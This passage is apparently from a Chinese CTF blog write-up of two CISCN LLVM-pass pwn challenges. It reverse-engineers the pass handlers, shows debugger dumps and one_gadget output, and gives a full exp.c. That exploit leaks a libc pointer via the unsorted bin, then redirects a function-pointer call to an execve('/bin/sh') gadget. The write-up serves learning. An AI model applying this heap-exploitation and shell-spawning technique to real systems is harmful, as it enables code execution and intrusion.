*)&amp;v15[<span class="number">3</span> * v18 + <span class="number">-3</span> * v19] - v20) &gt;&gt; <span class="number">3</span>) == <span class="number">2</span> )</span><br><span class="line">          &#123;</span><br><span class="line">            v21 = *((_BYTE *)v8 + <span class="number">16</span>);</span><br><span class="line">            <span class="keyword">if</span> ( v21 == <span class="number">79</span> )</span><br><span class="line">            &#123;</span><br><span class="line">              v22 = <span class="number">0LL</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">              <span class="keyword">if</span> ( v21 != <span class="number">29</span> )</span><br><span class="line">                <span class="keyword">goto</span> LABEL_143;</span><br><span class="line">              v22 = <span class="number">-2LL</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            v23 = (__int64)&amp;v15[<span class="number">3</span> * v22</span><br><span class="line">                              + <span class="number">-3</span> * (<span class="type">unsigned</span> <span class="type">int</span>)llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - <span class="number">3</span>))];</span><br><span class="line">            v24 = &amp;v8[<span class="number">-3</span> * (*((_DWORD *)v8 + <span class="number">5</span>) &amp; <span class="number">0xFFFFFFF</span>)];</span><br><span class="line">            <span class="keyword">if</span> ( !(<span class="number">-1431655765</span> * (<span class="type">unsigned</span> <span class="type">int</span>)((<span class="type">unsigned</span> __int64)(v23 - (_QWORD)v24) &gt;&gt; <span class="number">3</span>)) )</span><br><span class="line">              <span class="keyword">goto</span> LABEL_154;</span><br><span class="line">            <span class="keyword">if</span> ( (*((_DWORD *)v8 + <span class="number">5</span>) &amp; <span class="number">0xFFFFFFF</span>) == <span class="number">0</span> )</span><br><span class="line">              <span class="keyword">goto</span> LABEL_153;</span><br><span class="line">            v25 = *v24;</span><br><span class="line">            v26 = *((_BYTE *)v8 + <span class="number">16</span>);</span><br><span class="line">            <span class="keyword">if</span> ( v26 == <span class="number">79</span> )</span><br><span class="line">            &#123;</span><br><span class="line">              v27 = <span class="number">0LL</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">              <span class="keyword">if</span> ( v26 != <span class="number">29</span> )</span><br><span class="line">                <span class="keyword">goto</span> LABEL_144;</span><br><span class="line">              v27 = <span class="number">-2LL</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            v28 = (__int64)&amp;v15[<span class="number">3</span> * v27</span><br><span class="line">                              + <span class="number">-3</span> * (<span class="type">unsigned</span> <span class="type">int</span>)llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - <span class="number">3</span>))];</span><br><span class="line">            v29 = &amp;v8[<span class="number">-3</span> * (*((_DWORD *)v8 + <span class="number">5</span>) &amp; <span class="number">0xFFFFFFF</span>)];</span><br><span class="line">            <span class="keyword">if</span> ( <span class="number">-1431655765</span> * (<span class="type">unsigned</span> <span class="type">int</span>)((<span class="type">unsigned</span> __int64)(v28 - (_QWORD)v29) &gt;&gt; <span class="number">3</span>) &lt;= <span class="number">1</span> )</span><br><span class="line">              <span class="keyword">goto</span> LABEL_154;</span><br><span class="line">            <span class="keyword">if</span> ( (*((_DWORD *)v8 + <span class="number">5</span>) &amp; <span class="number">0xFFFFFFF</span>u) &lt;= <span class="number">1</span> )</span><br><span class="line">              <span class="keyword">goto</span> LABEL_153;</span><br><span class="line">            v30 = v29[<span class="number">3</span>];</span><br><span class="line">   <span class="comment">// *************************************    / /         </span></span><br><span class="line">            sub_2430(&amp;src, v25);</span><br><span class="line">            sub_2430(v84, v30);</span><br><span class="line">            bytes = n;</span><br><span class="line">            chunk = <span class="built_in">malloc</span>(<span class="number">0x18</span>uLL);            <span class="comment">// 申请0x20的chunk</span></span><br><span class="line">            chunk[<span class="number">2</span>] = heap; </span><br></pre></td></tr></table></figure>
<p>我们看这部分代码，一开始函数名就很长，但是我们看到了 compare，以及上文出现了 v10 = (_BYTE *) llvm::Value::getName (0LL);<br>
v89 = dest; 这条，我们就大胆猜测，这里是判断函数名是否是 “save”。如果是，下面一大串就是对函数的一些常规检查，参数传递是否正确。</p>
<p><img data-src="C:%5CUsers%5C32644%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20220611234626847.png" alt="image-20220611234626847"></p>
<p>像这里就是检查参数是否是有两个，不然就无法执行。下面一直到分割线之前都是我们不需要搭理的，甚至下面的两个函数我们也不需要搭理。我们只要知道下面那些可以直接看懂的部分就好了。后面的分析大致一样。</p>
<h3 id="save"><a class="markdownIt-Anchor" href="#save">#</a> save</h3>
<p>我们看 save 部分的关键代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">       sub_2430(&amp;src, v25);</span><br><span class="line">       sub_2430(v84, v30);</span><br><span class="line">       bytes = n;</span><br><span class="line">bytes = n;</span><br><span class="line">       chunk = <span class="built_in">malloc</span>(<span class="number">0x18</span>uLL);            <span class="comment">// 申请0x20的chunk</span></span><br><span class="line">       chunk[<span class="number">2</span>] = heap_ptr;                    <span class="comment">// +0x18</span></span><br><span class="line">       heap_ptr = chunk;                       <span class="comment">// 明显这里储存了chunk的地址</span></span><br><span class="line">       v33 = (<span class="type">char</span> *)src;</span><br><span class="line">       <span class="built_in">memcpy</span>(chunk, src, bytes);          <span class="comment">// 向chunk中拷贝数据</span></span><br><span class="line">       v34 = chunk_ptr + <span class="number">1</span>;</span><br><span class="line">       v35 = (<span class="type">char</span> *)v84[<span class="number">0</span>];</span><br><span class="line">       <span class="built_in">memcpy</span>(v34, v84[<span class="number">0</span>], (<span class="type">size_t</span>)v84[<span class="number">1</span>]);</span><br></pre></td></tr></table></figure>
<p>首先申请到一个 0x20 大小的 chunk，并将这个地址记录到全局变量 heap。就是说这个 heap 变量每次经过 save 就会被更新，旧的并没有被保存。chunk+0x18 的内存记录 heap 变量的地址。下面是有个 src，以及两个 memcpy，但是我们还不清楚 src 以及 v84 是什么。简单进入 sub_2430 函数看一眼，知道这起码是两个字符串，而且是我们传进来的参数。<em>“isString() &amp;&amp; “Not a string””,</em>, “isa<X>(Val) &amp;&amp; “cast_or_null<Ty>() argument of incompatible type!””, 涉及到对字符串的看呗我们还需要进行调试。拷贝分 2 次，我们一会调试看看。</p>
<p>经过调试，src 就是我们 save () 的第一个参数，v84 是第二个参数。 而且我们发现我们申请到的空间离 heap 页开始的地址非常远。第一个参数会写在用户区最开始的地方，第二个参数在 chunk_use+0x8，所以我们猜测应该会有检查参数长度。但是我们不需要管。而且调试的时候还发现，我们在 chunk+0x18 的地方会写入 heap_ptr 保存的值。其实就是上一个 save 创建的 chunk。这样就形成了单链表。</p>
<p>我们继续看剩下的几个操作，</p>
<h3 id="takeaway"><a class="markdownIt-Anchor" href="#takeaway">#</a> takeaway</h3>
<p>相似的检查方式，只不过参数变为了一个。这里话有个重要的变量 n。但是目前不清楚数值。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span></span><br><span class="line">           &#123;</span><br><span class="line">             heap_ptr = (_QWORD *)heap_ptr[<span class="number">2</span>];</span><br><span class="line">           &#125;</span><br><span class="line">           <span class="built_in">free</span>(v45);</span><br></pre></td></tr></table></figure>
<p>猜测其实就是删除某个 chunk，并且将全局变量 heap_ptr 回复为上一个 chunk。但是具体是否有查询功能还不确定。</p>
<h3 id="stealkey"><a class="markdownIt-Anchor" href="#stealkey">#</a> stealkey</h3>
<p>这部分代码很少，也没有检查函数的参数，所以这个函数应该是没有参数的。关键点在于 byte_204100 = *heap; 某个全局变量值变为 chunk 的字符串的值对应的内存值。。</p>
<h3 id="fakekey"><a class="markdownIt-Anchor" href="#fakekey">#</a> fakekey</h3>
<p>要求函数有一个参数。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">v76 = byte_204100;</span><br><span class="line">              <span class="keyword">if</span> ( *(_BYTE *)(*v75 + <span class="number">16LL</span>) == <span class="number">13</span> )</span><br><span class="line">                SExtValue = llvm::APInt::getSExtValue((llvm::APInt *)(*v75 + <span class="number">24LL</span>));</span><br><span class="line">              <span class="keyword">else</span></span><br><span class="line">                SExtValue = <span class="number">0LL</span>;</span><br><span class="line">              byte_204100 = v76 + SExtValue;</span><br><span class="line">              *heap = v76 + SExtValue;</span><br></pre></td></tr></table></figure>
<p>v76 可以通过刚刚的 steal 来设置，就会变为我们可控的值。关键在与 sextvalue 是什么，我们调试看看</p>
<p><img data-src="C:%5CUsers%5C32644%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20220612014631136.png" alt="image-20220612014631136"></p>
<p>调试后发现就是我们传进去的参数，如果我们要传负数，那就写补码。</p>
<h3 id="run"><a class="markdownIt-Anchor" href="#run">#</a> run</h3>
<p>run 函数是最关键的也是最离谱的，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">((<span class="type">void</span> (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))*heap)</span><br></pre></td></tr></table></figure>
<p>直接无脑调用 heap_ptr 指向的 chunk 的 fd，那么思路就是想办法把地址写进去。这里就存在两个关键地方，一个是 fakekey 可以实现对 chunk 的 fd 的修改，在 v76 的基础上加上一个偏移量，那么如果我们能将 v76 的值改为 libc 或者 libc 的一个相关的值，加上一个 offset，就可以实现任意函数调用。因为 call  *heap 后面指定了参数为 0，我们就使用 onegadget。我们先看看这里的栈布局。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────[ REGISTERS ]──────────────────────────────────</span><br><span class="line">*RAX  <span class="number">0x7ffff33412fc</span> (exec_comm+<span class="number">2508</span>) ◂— mov    rax, qword ptr [rip + <span class="number">0x2e0ba5</span>]</span><br><span class="line">*RBX  <span class="number">0x0</span></span><br><span class="line">*RCX  <span class="number">0x0</span></span><br><span class="line">*RDX  <span class="number">0x0</span></span><br><span class="line">*RDI  <span class="number">0x0</span></span><br><span class="line">*RSI  <span class="number">0x0</span></span><br><span class="line">*R8   <span class="number">0x0</span></span><br><span class="line">*R9   <span class="number">0x0</span></span><br><span class="line">*R10  <span class="number">0x7c7738</span> —▸ <span class="number">0x822940</span> —▸ <span class="number">0x7fffffffdcf8</span> —▸ <span class="number">0x7e4b50</span> —▸ <span class="number">0x7e4b70</span> ◂— ...</span><br><span class="line">*R11  <span class="number">0x7ffff33f3b20</span> ◂— pop    rdi</span><br><span class="line">*R12  <span class="number">0x826e10</span> —▸ <span class="number">0x7c7738</span> —▸ <span class="number">0x822940</span> —▸ <span class="number">0x7fffffffdcf8</span> —▸ <span class="number">0x7e4b50</span> ◂— ...</span><br><span class="line"> R13  <span class="number">0x7fffffffda20</span> —▸ <span class="number">0x7fffffffda30</span> ◂— <span class="number">0x79656b006e7572</span> <span class="comment">/* &#x27;run&#x27; */</span></span><br><span class="line">*R14  <span class="number">0x826e40</span> —▸ <span class="number">0x826d88</span> —▸ <span class="number">0x826c80</span> —▸ <span class="number">0x826b80</span> —▸ <span class="number">0x826990</span> ◂— ...</span><br><span class="line">*R15  <span class="number">0x826e28</span> —▸ <span class="number">0x7e5218</span> —▸ <span class="number">0x7fffffffdcf8</span> —▸ <span class="number">0x7e4b50</span> —▸ <span class="number">0x7e4b70</span> ◂— ...</span><br><span class="line">*RBP  <span class="number">0x8249c0</span> —▸ <span class="number">0x6e7572</span> (isl_basic_set_compute_vertices+<span class="number">2114</span>) ◂— js     <span class="number">0x6e757c</span></span><br><span class="line">*RSP  <span class="number">0x7fffffffd950</span> ◂— <span class="number">0x0</span></span><br><span class="line">*RIP  <span class="number">0x7ffff23a21ec</span> ◂— call   rax</span><br><span class="line">───────────────────────────────────[ DISASM ]───────────────────────────────────</span><br><span class="line"> ► <span class="number">0x7ffff23a21ec</span>    call   rax                           &lt;exec_comm+<span class="number">2508</span>&gt;</span><br><span class="line">        rdi: <span class="number">0x0</span></span><br><span class="line">        rsi: <span class="number">0x0</span></span><br><span class="line">        rdx: <span class="number">0x0</span></span><br><span class="line">        rcx: <span class="number">0x0</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>先看看有没有合适的寄存器的 one_gadget, 没有的话在选择 stack 布局。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">dreamcat@ubuntu:~/Desktop/llvm/SATool_2021_ciscn$ one_gadget /lib/x86_64-linux-gnu/libc-2.27.so -l3</span><br><span class="line">0x4f2a5 execve(<span class="string">&quot;/bin/sh&quot;</span>, rsp+0x40, environ)</span><br><span class="line">constraints:</span><br><span class="line">  rsp &amp; 0xf == 0</span><br><span class="line">  rcx == NULL</span><br><span class="line"></span><br><span class="line">0x4f302 execve(<span class="string">&quot;/bin/sh&quot;</span>, rsp+0x40, environ)</span><br><span class="line">constraints:</span><br><span class="line">  [rsp+0x40] == NULL</span><br><span class="line"></span><br><span class="line">0xe534f execve(<span class="string">&quot;/bin/sh&quot;</span>, r13, rbx)</span><br><span class="line">constraints:</span><br><span class="line">  [r13] == NULL || r13 == NULL</span><br><span class="line">  [rbx] == NULL || rbx == NULL</span><br><span class="line"></span><br><span class="line">0xe54f7 execve(<span class="string">&quot;/bin/sh&quot;</span>, [rbp-0x88], [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  [[rbp-0x88]] == NULL || [rbp-0x88] == NULL</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL</span><br><span class="line"></span><br><span class="line">0xe54fe execve(<span class="string">&quot;/bin/sh&quot;</span>, rcx, [rbp-0x70])</span><br><span class="line">constraints:</span><br><span class="line">  [rcx] == NULL || rcx == NULL</span><br><span class="line">  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL</span><br><span class="line"></span><br><span class="line">0xe5502 execve(<span class="string">&quot;/bin/sh&quot;</span>, rcx, rdx)</span><br><span class="line">constraints:</span><br><span class="line">  [rcx] == NULL || rcx == NULL</span><br><span class="line">  [rdx] == NULL || rdx == NULL</span><br><span class="line"></span><br><span class="line">0x10a2fc execve(<span class="string">&quot;/bin/sh&quot;</span>, rsp+0x70, environ)</span><br><span class="line">constraints:</span><br><span class="line">  [rsp+0x70] == NULL</span><br><span class="line"></span><br><span class="line">0x10a308 execve(<span class="string">&quot;/bin/sh&quot;</span>, rsi, [rax])</span><br><span class="line">constraints:</span><br><span class="line">  [rsi] == NULL || rsi == NULL</span><br><span class="line">  [[rax]] == NULL || [rax] == NULL</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>好多可以用的。</p>
<p>问题来了我们怎么泄露 libc? 或者能否直接得到一个与 libc 相关的值？</p>
<p>其实在第一次调试的时候吗，我们注意到第一次申请 0x20chunk 的时候，bins 不是空的，有 0x20 的 smallbin，largebin，u 你 sorted 斌，以及 tcache 中也有 7 个 bin。所以我们 save7 次将 tcache 取完，下一次就可以从 unsortedbin 中拿到，并且 fd 指向的是 main_arena+96, 与 libc 相关。我们只需要计算一下 offset 就可以了。</p>
<p>我们申请第 8 个 chunk 的时候就选择空输入（’\x00’），就不会变动 fd。</p>
<p><img data-src="C:%5CUsers%5C32644%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20220612021912812.png" alt="image-20220612021912812"></p>
<p>这里可选择的 one_gadget 就很多了。选择了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x10a2fc</span> execve(<span class="string">&quot;/bin/sh&quot;</span>, rsp+<span class="number">0x70</span>, environ)</span><br><span class="line">constraints:</span><br><span class="line">  [rsp+<span class="number">0x70</span>] == <span class="literal">NULL</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>完整的 exp.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">run</span><span class="params">()</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">save</span><span class="params">(<span class="type">char</span> *a1,<span class="type">char</span> *a2)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">fakekey</span><span class="params">(int64)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">takeaway</span><span class="params">(<span class="type">char</span> *a1)</span>&#123;<span class="keyword">return</span> <span class="number">0</span>;&#125;;</span><br><span class="line"><span class="type">int</span> <span class="title function_">B4ckDo0r</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">        save(<span class="string">&quot;aaaa&quot;</span>,<span class="string">&quot;bbbb&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;aaddd&quot;</span>,<span class="string">&quot;aadd&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;ssss&quot;</span>,<span class="string">&quot;sss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;ssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">	save(<span class="string">&quot;sssss&quot;</span>,<span class="string">&quot;sssss&quot;</span>);</span><br><span class="line">        save(<span class="string">&quot;\x00&quot;</span>,<span class="string">&quot;ssssss&quot;</span>);</span><br><span class="line">        stealkey();</span><br><span class="line">        fakekey(<span class="number">-0x2E19b4</span>);</span><br><span class="line">        run();</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>补充点，runOnFunction 会检查我们 exp 的入口是不是 B4ckDo0r，因为我们习惯 C 语言的代码为 main 为程序的入口。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">dest[<span class="number">2</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  name = (_QWORD *)llvm::Value::getName(a2);</span><br><span class="line">  <span class="keyword">if</span> ( v3 == <span class="number">8</span> &amp;&amp; *name == <span class="string">&#x27;r0oDkc4B&#x27;</span> )</span><br><span class="line">  &#123;</span><br></pre></td></tr></table></figure>
<h2 id="ciscn-2022-satool"><a class="markdownIt-Anchor" href="#ciscn-2022-satool">#</a> ciscn 2022 satool</h2>
<p>这里我依旧是跟着师傅们的文章一边复现一边记录学习。</p>
<p>首先还是看 readme，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">## Introduction</span><br><span class="line">A LLVM Pass that can optimize add/sub instructions.</span><br><span class="line">## How to run</span><br><span class="line">opt-12 -load ./mbaPass.so -mba &#123;*.bc/*.ll&#125; -S</span><br><span class="line">## Example</span><br><span class="line">### IR before optimization</span><br><span class="line">```</span><br><span class="line">define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 &#123;</span><br><span class="line">  %2 = sub nsw i64 %0, 2</span><br><span class="line">  %3 = add nsw i64 %2, 68</span><br><span class="line">  %4 = add nsw i64 %0, 6</span><br><span class="line">  %5 = add nsw i64 %4, -204</span><br><span class="line">  %6 = add nsw i64 %5, %3</span><br><span class="line">  ret i64 %6</span><br><span class="line">&#125;</span><br><span class="line">```</span><br><span class="line">### IR after optimization</span><br><span class="line">```</span><br><span class="line">define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 &#123;</span><br><span class="line">  %2 = mul i64 %0, 2</span><br><span class="line">  %3 = add i64 %2, -132</span><br><span class="line">  ret i64 %3</span><br><span class="line">&#125;</span><br><span class="line">```</span><br></pre></td></tr></table></figure>
<p>opt-12 对应的就是 llvm-12，而且题目没有给出 opt。有师傅讲 ubuntu18 是不支持 opt-12 的。</p>
<p>我们看看程序是如何优化代码的，在 handle 部分，有几个点，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v30 = *((_QWORD *)this + <span class="number">4</span>) + <span class="number">0xFF0</span>LL;        <span class="comment">// shellcode结束的地方，0x***ff0</span></span><br></pre></td></tr></table></figure>
<p>这里的 v30 就是指定了我们结束的空间，用来下面判断是会溢出超出这个区域。下面有三个分支，但是我们的目标是最后一个 else</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span>                                          <span class="comment">// 真实的优化过程</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="string">&#x27;anonymous namespace&#x27;</span>::MBAPass::writeMovImm64(this, <span class="number">0</span>, <span class="number">0LL</span>);<span class="comment">// 在最开始的地方写movabs rax,0x0</span></span><br><span class="line">    *((_DWORD *)this + <span class="number">12</span>) = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">stack</span>&lt;llvm::Value *&gt;::<span class="built_in">stack</span>&lt;<span class="built_in">std</span>::<span class="built_in">deque</span>&lt;llvm::Value *&gt;,<span class="type">void</span>&gt;(v26);</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">stack</span>&lt;<span class="type">int</span>&gt;::<span class="built_in">stack</span>&lt;<span class="built_in">std</span>::<span class="built_in">deque</span>&lt;<span class="type">int</span>&gt;,<span class="type">void</span>&gt;(<span class="built_in">stack</span>);</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">stack</span>&lt;llvm::Value *&gt;::push(v26, &amp;v27);</span><br><span class="line">    v24 = <span class="number">1</span>;</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">stack</span>&lt;<span class="type">int</span>&gt;::push(<span class="built_in">stack</span>, &amp;v24);</span><br><span class="line">    <span class="keyword">while</span> ( *((_QWORD *)this + <span class="number">5</span>) &lt; v30 )</span><br></pre></td></tr></table></figure>
<p>执行完 *（this+12） = 0 后的情况是在这样的</p>
<p><img data-src="C:%5CUsers%5C32644%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20220612213526191.png" alt="image-20220612213526191"></p>
<p>this+12 指向的是 0x4c8d70 四字节。0x4c8c68 是记录当前我们要写入指令的位置。</p>
<p>writeMovImm64 (this, 0, 0LL)，第二个参数指定寄存器，0 为 rax，1 为 rbx，0LL 是 64 位立即数。同理 writeret 就是向木匾位置写入 ret (0xc3)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> RDI  <span class="number">0x4c8c40</span> —▸ <span class="number">0x7ffff21dbd30</span> —▸ <span class="number">0x7ffff21cded0</span> ◂— push   rbp</span><br><span class="line"> RSI  <span class="number">0x48af78</span> —▸ <span class="number">0x4ddf80</span> —▸ <span class="number">0x7fffffffd560</span> —▸ <span class="number">0x4b3820</span> —▸ <span class="number">0x4b3840</span> ◂— ...</span><br><span class="line"> R8   <span class="number">0x4def70</span> ◂— <span class="number">0x637566</span> <span class="comment">/* &#x27;fuc&#x27; */</span></span><br><span class="line"></span><br><span class="line">pwndbg&gt; x/<span class="number">28</span>gx <span class="number">0x48af78</span><span class="number">-0x18</span></span><br><span class="line"><span class="number">0x48af60</span>:	<span class="number">0x0000000000000040</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0x48af70</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x00000000004ddf80</span></span><br><span class="line"><span class="number">0x48af80</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x5000000000000000</span></span><br><span class="line"><span class="number">0x48af90</span>:	<span class="number">0x00000000004ddf50</span>	<span class="number">0x0000000000004000</span></span><br><span class="line"><span class="number">0x48afa0</span>:	<span class="number">0x00000000004dbc30</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x48afb0</span>:	<span class="number">0x00000000004dbc48</span>	<span class="number">0x00000000004dbc48</span></span><br><span class="line"><span class="number">0x48afc0</span>:	<span class="number">0x00000000004df4d8</span>	<span class="number">0x00000000004df4d8</span></span><br><span class="line"><span class="number">0x48afd0</span>:	<span class="number">0x00000000004df490</span>	<span class="number">0x0000000000000001</span></span><br><span class="line"><span class="number">0x48afe0</span>:	<span class="number">0x00000000004ddec0</span>	<span class="number">0x00000000004de308</span></span><br><span class="line"><span class="number">0x48aff0</span>:	<span class="number">0x00000000000000bc</span>	<span class="number">0x0000000000000051</span></span><br><span class="line"><span class="number">0x48b000</span>:	<span class="number">0x00007fff00000000</span>	<span class="number">0x000000000048c410</span></span><br><span class="line"><span class="number">0x48b010</span>:	<span class="number">0x000000000048b120</span>	<span class="number">0x000000000048acf0</span></span><br><span class="line"><span class="number">0x48b020</span>:	<span class="number">0x000000000048b030</span>	<span class="number">0x000000000000000a</span></span><br><span class="line"><span class="number">0x48b030</span>:	<span class="number">0x766e6f6761786568</span>	<span class="number">0xffffffffff003536</span></span><br><span class="line">pwndbg&gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>
